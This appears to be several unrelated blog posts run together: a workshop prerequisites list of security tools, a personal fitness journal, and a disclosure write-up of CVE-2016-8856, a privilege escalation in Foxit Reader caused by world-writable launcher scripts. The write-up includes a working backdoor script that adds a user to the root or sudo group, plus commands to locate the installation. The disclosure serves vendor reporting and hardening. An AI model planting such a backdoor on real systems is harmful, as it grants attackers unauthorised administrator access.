Prerequisites

If you are one of the attendees, and you want to follow along (I highly recommend this), then please ensure either of the following prerequisites are met.

Bare Minimum

At the very least, please ensure that you have access to either Ubuntu 22.04 or newer. This could be installed on your laptop, in some cloud environment or as a VM. Also the laptop should be able to connect to your mobile hotspot as well for download dependencies, libraries, tools, code snippets, etc. The link to the repository containing the code used during the workshop will be shared at the start of the workshop.

Best Case

Following is the list of requirements that would make it much easier to follow along and also would limit the dependency on the Internet by a lot.

• You have Ubuntu 22.04 or newer installed in a hypervisor like VirtualBox, VMWare, etc. The virtual machine should have at least 4 GB RAM and 2 CPU cores for smoother experience. You should also have admin rights on this VM.

• Your system has Python 3.8 or newer and Pip installed.

• You have access to any Terminal application and Bash shell.

• You have Nmap installed: apt-get install nmap.

• You have setup a virtual environment for your Python packages.

• You have following Python packages installed:

  • requests

  • python-nmap

  • selenium

  • Flask (for intentionally vulnerable app)

  • dnspython

  • PyYAML

  • boto3

  • dpkt

  • paramiko

• You have Nuclei installed.

• You have Yara and Yara-Python installed.

See you at the Seasides!

TL;DR: I recently picked up walking/jogging and improved my eating habits to get healthier. This blog below is a journal of my ~3 months/90 days journey. You can directly jump to Tips sections below, if you want to skip all that.

Background

For a long long time, I considered myself athletic and agile. In my mind, at least. But in past few years, other priorities took over the life and I let my health become a second priority. And that’s how I found myself by December 2023, all of 94 KGs and feeling the bodyweight slowing me down. For the first time in my life, I realised I am getting obese and did not like what I was becoming. I was looking for ways to get back in shape and be healthier overall, however, the plan kept shifting due to one thing or another.

The Challenge

During one fortunate day in December 2023, I was discussing with my friend that we need to go out, work out, lose weight, etc etc. Upon which he told me that he needs to get new shoes which is what’s stopping him from going out. I suggested that he should not let this be a reason for not running. Just start walking/running in basic shoes once and he should keep aside a certain amount for every month he has run. Once he has enough funds, he can upgrade the shoes, if he needed those. And that was how another friend chimed in and we came up with the idea of creating a health challenge. The terms of the challenge were pretty simple:

• We will start a monthly challenge from January 1, 2024 till June 30, 2024.

• Every participant would be added to a Strava group and would need to log their walk/jog/run activities as proof.

• Every participant needs to complete at least 60 KMs in a month.

• Whichever participant fails to complete the challenge, they would need to pay certain pre-decided amount to rest of the successful participants, divided equally.

Somehow. a lot of my colleagues/friends connected with the idea. We were able to convince a few more and by January 1, we had 18 people willing to take on the challenge. We created a challenge on Strava and as of now, there are 21 people who have started working out regularly, as compared to none at all previously.

I have tried picking up gym/workouts/running multiple times before, but never could quite stick to the regimen. However, once I started this challenge, I knew I had to do it. You can say the reason is something else, be it may competitiveness, peer/social pressure, etc. But what’s important is that it got me into the habit of running. Because if not now, then when?

The Process

December 2023

• Didn’t decide on a date, just wore my shoes and went out for my first walk on 12 December 2023. 30-35 minutes of brisk walking.

• Walked my first 5K on 21 December 2023, finished in ~53 minutes.

• Didn’t want to make too many changes so started with walking in evening after office since I wasn’t used to waking up early. Started with small changes.

• December last week was on vacation so only ended up walking 30 kms.

• Started to watch I was eating, avoided junk and processed food wherever possible.

• KMs Walked: 30 / Weight Lost: ~1 KG / Workout Days: 9 out of 31

January 2024

• Started walking and eating healthy seriously.

• Ensured I was working out at least 35-40 minutes, 6 days a week.

• Completed 2 5Ks. Improved my timing to 45 minutes at Pune Soldierathon.

• Had 2 trips for work and wedding, but maintained my streak of regularly walking.

• Walked 10 kms in a single workout to finish another Strava challenge.

• Started watching the nutrients I was having in my meals. Increased protein intake and made sure to include salad/vegetables in daily diet.

• KMs Walked: 130 / Weight Lost: ~2 KGs / Workout Days: 26 out of 31

February 2024

• Shifted workout timing to morning, now that I was used to regularly walking,

• For first 2 weeks, I was walking 2 times in a day. Realised that I was probably overdoing it, causing more hard than good.

• Ran another 5K, completing in 44 minutes this time.

• To increase running duration and distance, started with the Couch to 5K program.

• Increased jogging frequency now that I was comfortable with walking daily.

• Focused on maintaining calorie deficit (burning more calories compared to what I was consuming).

• Started following Intermittent Fasting. Most days, I tried to follow 14:10 approach, meaning 14 hours of fasting followed by 10-hours window of eating.

• To see how what I was eating was affecting my blood sugar, I wore Continuous Glucose Monitoring (CGM) sensor by Ultrahuman. This gave me good insights into what food items are my Kryptonite.

• KMs Walked: 150 / Weight Lost: ~2 KGs / Workout Days: 24 out of 29

March 2024

• Most consistent month. Worked out at least 40 minutes, every single day in March.

• Ran my first 10K, completing in 88 minutes. 5K during the same run was in 43 minutes.

• While I worked out every day, ensured that I was doing low intensity workouts on my rest days. Rest days are important.

• Trekked to Vasota fort with friends, a very good test of endurance.

• Started strength training at home with body weight and dumbbell workouts.

• Struggled a bit on diet front, trying to control the cravings. Had more cheat days than I would ideally want to.

• KMs Walked: 141 / Weight Lost: ~2.5 KG / Workout Days: 31 out of 31

Running Gear

During these 3 months, I used the following:

• Nike Running Shorts - Highly recommended, very comfortable.

• Nike Pegasus Trail 4 GORE-TEX - These were my original daily training shoes, ran close to 300 kms in these. However, due to some issue they were causing pain in right feet when running. Discovered the flaw only after I started running.

• Adidas 4DFWD Pulse - A friend got it for a very good discount from Dubai. These are my current daily trainers but due to some interior manufacturing defect, they are causing constant shoe-bites. Ran close to 150 kms in these but now using as cricket shoes.

• Nike Invincible Run 3 - Recently upgraded to these for daily training.

Some Tips

• Just Do It: Tomorrow, next Monday, next month, next week never comes. Do not wait for a decided date to start some good habit. Just remember that the hardest thing is to get out of the bed, rest everything is easy.

• Start Out Small: One of the worst mistake you can do while starting to work out and/or eat healthy is going all out from day one. If you change too many things too fast, you body might resist and you would probably give up with negative experience in your mind. For example, if you are not used to waking up early, start with walking in evenings and slowly shift to morning once you are used to it. If you feel walking 5 KMs is too much, start with 2-3 KMs and progress from there.

• Discipline And Consistency: Most important thing is to be disciplined enough to go out everyday. Make it part of your daily habits and ensure that you are following through the commitment.

• Invest In Good Shoes: Do your own research and invest in some good running shoes. Your body will thank you for it. No need to go overboard and buy Nike Alphafly/Vaporfly, just something decent should work at the start. You can always upgrade once you are a regular, just don’t let it be the reason you are not going out. Similarly, do not cheap out. Some good shoes available in India - Adidas Duramo 10, Asics GT 1000, Nike Pegasus 40, Adidas Ultraboost, Asics Gel Kayano 30 / Gel Nimbus 26, Nike Invincible Run 3, etc,. Might write a new post in future to share good shoes and deals available in India.

• Read Before You Eat: Get into the habit of reading the ingredients list and nutrient chart before you eat. Brown bread might just mean brown in colour and not free of all-purpose flour/maida. Similarly, sugar-free does not always mean healthy, it could be more harmful depending on the substitute used.

• You Can’t Out-train Bad Diet: Read about how you can improve your eating habits and focus on following sustainable habits. Whatever changes you make to your diet need to be something you can sustain for long time.

• If You Can’t Measure It, You Can’t Improve It: Use a smartwatch/phone to measure whatever metrics you want to improve on. It could be weight, daily exercise minutes, resting heart rate, minutes per kilometre, VO2Max, steps you walked, etc. This would help you track the progress and you can gamify your habits.

• Don’t Get Too Obsessed With Numbers: Contrary to above advice, also don’t think too much about the numbers. Do not go overboard while tracking things and do not feel too much disappointed if the metrics are not moving at the pace you expected. There would be days when you might see no improvements or you might even slip away, it’s alright. Maintain discipline and take things one day at a time.

• Make It a Habit to Go Out Everyday: Once you start walking/working out, make sure that you are consistent. Your intensity can vary, but ensure that you are working out regularly. Walk for 10 minutes even, but ensure that you are consistent and making a habit out of it.

• Power of Partners: Find yourself a few friends/colleagues/partners-in-crime/communities/groups to take on the challenge with and you’ll notice that this gets easier. On days when you won’t feel like getting out of the bed, a message from someone else might just be the motivation you need.

• Be Kind to Yourself: Whatever you are trying to achieve, please make sure to be kind to yourself. Also, when you achieve the goals you set for yourself, do not forget to reward yourself. Getting healthy is a long-term commitment and it might take some time for you to see the progress. Don’t let it demotivate you. Listen to your body; if it asking you take some rest, do it.

That’s all, folks! I will be back with a shorter update, maybe in another month.

TL;DR: I found a local privilege escalation bug in Foxit Reader for Mac and Linux. Random find, had to run ls -la to find this. The issue has been assigned CVE-2016-8856.

Introduction

Recently, I stumbled on a very simple bug in Foxit Reader for Mac and Linux (From here on, just Foxit Reader). The vulnerability was caused by improper file permissions granted on core Foxit Reader's files on Linux and Mac systems. An attacker with a low privilege access could've exploited this vulnerability to elevate their privileges, execute commands as a higher privileged user, or both.

The version affected were:

• Foxit Reader for Mac 2.1.0.0804 and earlier

• Foxit Reader for Linux 2.1.0.0805 and earlier

Fixed version has been released and security bulletin is published here - https://www.foxitsoftware.com/support/security-bulletins.php.

About the Bug

The issue is caused by the way Foxit Reader installs itself on the Linux/Mac machine. At the time of installation, user is given a choice of where they want to install Foxit. The default locations for installation are:

• On Linux

  • sudo or root user - /opt/

  • normal user - ~/opt/

• On Mac

  • /Applications/Foxit Reader.app/

The issue exists in file permissions assigned to the installed files. The installer assigns "rwxrwxrwx" or 0777 permission to most of the files in the installation folder. In these files, the more important ones are:

• FoxitReader.sh and updater.sh on Linux (tested on Debian 8 Jessie)

• FoxitReader and updater.app/Contents/MacOS/updater on OS X (tested on Yosemite)

These files are used to launch Foxit Reader and update it, respectively. Since, these files are world-writable, any logged in user with limited privileges can write to these files. After that, whenever a privileged user will open the Foxit Reader application, attacker's custom code would run.

Reproduction/ Exploit Example

The steps described below show how the vulnerability could be exploited on a Linux-based OS. We have tested this on Debian 8.

1. Search for Foxit reader installation in the system. If not found on above mentioned default locations, you can use following command to search it in system:

find / -iname foxit\* 2> /dev/null  

2. Go to installation folder, generally foxitsoftware/foxitreader/.
3. Open FoxitReader.sh and replace the content with this:

#!/bin/bash
 appname="FoxitReader"
 selfpath="/opt/foxitsoftware/foxitreader"
 LD_LIBRARY_PATH=$selfpath/lib:$selfpath/platforms:$selfpath/printsupport:$selfpath/rmssdk:$selfpath/sensors:$selfpath/imageformats:$selfpath/platforminputcontexts:$LD_LIBRARY_PATH
 export LD_LIBRARY_PATH

# Backdoor starts from here
 if [ "$(id | grep root | wc -l)" == 1 ]
then  
    adduser temp root
elif [ "$(groups | grep sudo | wc -l)" == 1 ]  
then  
    gksudo -- bash -c 'foxit_command_which_does_not_exist_but_hides_our_original_command 2> /dev/null; sudo adduser temp sudo;'
fi  
# Backdoor ends
 exec "$selfpath/$appname" "$@"

4. Wait for root/sudo user to open Foxit Reader.
5. ???
6. Profit.

CVSS

CVSS v3 Base Score: 7.8 High
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

18-09-2016 Vendor notified about the bug.
19-09-2016 Vendor replies they are looking into the issue.
28-09-2016 Vendor confirms and fixes the bug.
18-10-2016 New version with fix released. Applied for CVE.
19-10-2016 CVE-2016-8856 assigned to the vulnerability.

Takeaway

Always make sure that files on your system only have the required permissions. Don't be that guy who chmod's 777 on every file. Another issue is files with SUID/SGID bit on them, but that is a topic for another day/blog post.

Also, to search for world writeable files on your system, run the following command:

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print  

Source <- Excellent source for Linux privilege escalation basic.

Kudos to Foxit's Security Team for prompt acknowledgement and fix.